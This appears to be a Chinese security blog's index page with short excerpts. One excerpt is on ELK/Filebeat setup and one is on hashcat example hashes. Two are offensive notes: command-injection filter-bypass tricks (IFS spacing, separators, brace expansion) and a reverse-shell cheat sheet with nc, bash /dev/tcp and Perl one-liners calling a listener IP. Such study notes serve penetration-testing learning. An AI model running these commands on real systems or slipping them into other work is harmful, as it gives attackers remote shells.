ELK搭建2

前言

elk是指 ,elasticsearch+Logstash+Kibana

上次搭建是使用旧版本,具体搭建过程

https://xycsec.cn/?p=215

本次搭建是把logstash换了了filebeat.

logstash可以对数据进行处理,但是我们的数据格式可能多种多样,索性就不对数据做处理,直接读取并显示一行。

搭建过程和上面的过程大同小异

最主要的是elk下载的时候尽量下载同一个版本。

本次搭建依旧使用的是centos7+JDK1.8+elk 7.10.0,环境搭建不在赘述

搭建未用到logstash

1、elastics[……]

继续阅读

hashcat 示例hash

Example hashes

If you get a “line length exception” error in hashcat, it is often because the hash mode that you have requested does not match the hash. To verify, you can test your commands against example hashes.

Unless otherwise noted, the password for all example hashes is hashcat.

[……]

继续阅读

反弹shell绕过技术

1、空格过滤

< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等

2、一些命令分隔符

linux中:%0a 、%0d 、; 、& 、| 、&&、||、“
windows中:%0a、&、|、%1a(一个神奇的角色,作为.bat文件中的命令分隔符)

3、花括号的别样用法

在Linux bash中还可以使用{OS_COMMAND,ARGUMENT}来执行系统命令
{cat,flag}

4、拼接绕过

例如:过滤了sh
使用变量,把过滤的字符设置成变量
nc -e /bin/sh 192.[……]

继续阅读

反弹shell

监听:
nc -l -p 8080 -vvv
靶机执行:
#nc
nc -e /bin/sh 192.168.90.125 8080
#bash版本:
bash -i >& /dev/tcp/192.168.90.125/8080 0>&1
#perl版本:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDI[......]

继续阅读